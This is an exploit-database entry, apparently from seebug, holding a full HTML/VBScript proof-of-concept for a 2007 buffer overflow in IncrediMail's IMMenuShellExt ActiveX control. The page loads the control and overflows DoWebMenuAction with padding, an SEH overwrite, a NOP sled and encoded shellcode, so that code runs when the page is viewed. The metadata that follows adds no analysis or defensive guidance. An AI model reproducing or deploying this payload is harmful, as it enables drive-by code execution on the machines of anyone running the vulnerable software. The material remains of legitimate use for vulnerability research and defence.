IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit

2007-05-08T00:00:00

Description

No description provided by source.

{"sourceData": "\n \r\n\r\n\r\n<html>\r\n\r\n<title>\r\n IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit - By Umesh Wanve\r\n</title>\r\n\r\n<body>\r\n\r\n<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:F8984111-38B6-11D5-8725-0050DA2761C4" > </OBJECT>\r\n\r\n<script language="vbscript">\r\n\r\n\r\nshellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")\r\nshellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")\r\nshellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")\r\nshellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")\r\nshellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")\r\nshellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")\r\nshellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")\r\nshellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")\r\nshellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")\r\nshellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")\r\nshellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")\r\n\r\n\r\nnop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90") \r\n\r\npointer_to_seh=unescape("%eb%06%90%90")\r\n\r\n\r\n\r\nseh_handler=unescape("%a9%11%02%75") \r\n\r\n \r\n\r\ntargetFile = "C:\\PROGRA~1\\INCRED~1\\bin\\ImShExt.dll"\r\nprototype = "Sub DoWebMenuAction ( ByVal bsPath As String )"\r\nmemberName = "DoWebMenuAction"\r\nprogid = "INCREDISHELLEXTLib.IMMenuShellExt"\r\nargCount = 1\r\n\r\narg1=String(2483, "A")\r\n\r\n\r\n\r\narg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop\r\n\r\ntarget.DoWebMenuAction arg1 \r\n\r\n</script>\r\n</body>\r\n</html>\r\n\r\n# sebug.net\r\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-13438", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-13438", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T22:04:20", "published": "2007-05-08T00:00:00", "cvelist": [], "id": "SSV:13438", "enchantments_done": [], "modified": "2007-05-08T00:00:00", "title": "IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645300400, "score": 1659785532, "epss": 1678851499}}